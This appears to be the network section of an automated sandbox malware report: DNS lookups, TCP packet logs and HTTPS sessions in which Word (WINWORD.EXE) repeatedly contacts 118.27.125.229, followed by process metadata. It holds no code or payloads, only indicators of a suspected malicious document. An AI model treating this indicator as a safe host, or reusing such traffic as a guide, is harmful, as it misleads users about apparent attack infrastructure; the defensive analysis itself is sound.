Dec 20, 2022 14:08:19.414904118 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:19.414923906 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.992476940 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:19.992557049 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.000981092 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.001005888 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:20.005389929 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.005415916 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:20.571516991 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:20.571631908 CET | 443 | 49184 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:20.571744919 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.571906090 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.571906090 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.571937084 CET | 49184 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.590770960 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.590818882 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:20.590909004 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.591198921 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:20.591221094 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.167148113 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.167316914 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.174849033 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.174891949 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.178765059 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.178787947 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.739039898 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.739150047 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.739238024 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.739264011 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.739408970 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.739427090 CET | 443 | 49185 | 118.27.125.229 | 192.168.2.22 |
Dec 20, 2022 14:08:21.739464045 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Dec 20, 2022 14:08:21.739510059 CET | 49185 | 443 | 192.168.2.22 | 118.27.125.229 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 20, 2022 14:08:00.933084011 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:01.202795029 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Dec 20, 2022 14:08:03.900677919 CET | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:04.172363997 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Dec 20, 2022 14:08:04.183038950 CET | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:04.202842951 CET | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
Dec 20, 2022 14:08:09.143189907 CET | 55275 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:09.410435915 CET | 53 | 55275 | 8.8.8.8 | 192.168.2.22 |
Dec 20, 2022 14:08:09.418085098 CET | 59915 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:09.436068058 CET | 53 | 59915 | 8.8.8.8 | 192.168.2.22 |
Dec 20, 2022 14:08:16.610516071 CET | 54408 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:16.630496025 CET | 53 | 54408 | 8.8.8.8 | 192.168.2.22 |
Dec 20, 2022 14:08:16.633646965 CET | 50108 | 53 | 192.168.2.22 | 8.8.8.8 |
Dec 20, 2022 14:08:16.889527082 CET | 53 | 50108 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 20, 2022 14:08:00.933084011 CET | 192.168.2.22 | 8.8.8.8 | 0x2507 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 20, 2022 14:08:03.900677919 CET | 192.168.2.22 | 8.8.8.8 | 0x1150 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 20, 2022 14:08:04.183038950 CET | 192.168.2.22 | 8.8.8.8 | 0x1aac | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 20, 2022 14:08:09.143189907 CET | 192.168.2.22 | 8.8.8.8 | 0xdc64 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 20, 2022 14:08:09.418085098 CET | 192.168.2.22 | 8.8.8.8 | 0xbe50 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 20, 2022 14:08:16.610516071 CET | 192.168.2.22 | 8.8.8.8 | 0xc9b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 20, 2022 14:08:16.633646965 CET | 192.168.2.22 | 8.8.8.8 | 0xa51f | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 20, 2022 14:08:01.202795029 CET | 8.8.8.8 | 192.168.2.22 | 0x2507 | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false | ||
Dec 20, 2022 14:08:04.172363997 CET | 8.8.8.8 | 192.168.2.22 | 0x1150 | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false | ||
Dec 20, 2022 14:08:04.202842951 CET | 8.8.8.8 | 192.168.2.22 | 0x1aac | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false | ||
Dec 20, 2022 14:08:09.410435915 CET | 8.8.8.8 | 192.168.2.22 | 0xdc64 | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false | ||
Dec 20, 2022 14:08:09.436068058 CET | 8.8.8.8 | 192.168.2.22 | 0xbe50 | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false | ||
Dec 20, 2022 14:08:16.630496025 CET | 8.8.8.8 | 192.168.2.22 | 0xc9b | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false | ||
Dec 20, 2022 14:08:16.889527082 CET | 8.8.8.8 | 192.168.2.22 | 0xa51f | No error (0) | 118.27.125.229 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49175 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:02 UTC | 0 | OUT | |
2022-12-20 13:08:02 UTC | 0 | IN | |
2022-12-20 13:08:02 UTC | 0 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49176 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:04 UTC | 1 | OUT | |
2022-12-20 13:08:05 UTC | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49185 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:21 UTC | 16 | OUT | |
2022-12-20 13:08:21 UTC | 16 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49177 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:10 UTC | 1 | OUT | |
2022-12-20 13:08:10 UTC | 2 | IN | |
2022-12-20 13:08:10 UTC | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49178 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:11 UTC | 3 | OUT | |
2022-12-20 13:08:11 UTC | 3 | IN | |
2022-12-20 13:08:11 UTC | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49179 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:12 UTC | 4 | OUT | |
2022-12-20 13:08:13 UTC | 4 | IN | |
2022-12-20 13:08:13 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49180 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:14 UTC | 12 | OUT | |
2022-12-20 13:08:14 UTC | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49181 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:15 UTC | 13 | OUT | |
2022-12-20 13:08:16 UTC | 13 | IN | |
2022-12-20 13:08:16 UTC | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49182 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:17 UTC | 14 | OUT | |
2022-12-20 13:08:18 UTC | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49183 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:18 UTC | 15 | OUT | |
2022-12-20 13:08:19 UTC | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49184 | 118.27.125.229 | 443 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-12-20 13:08:20 UTC | 15 | OUT | |
2022-12-20 13:08:20 UTC | 16 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Target ID: | 0 |
Start time: | 14:07:14 |
Start date: | 20/12/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f9d0000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |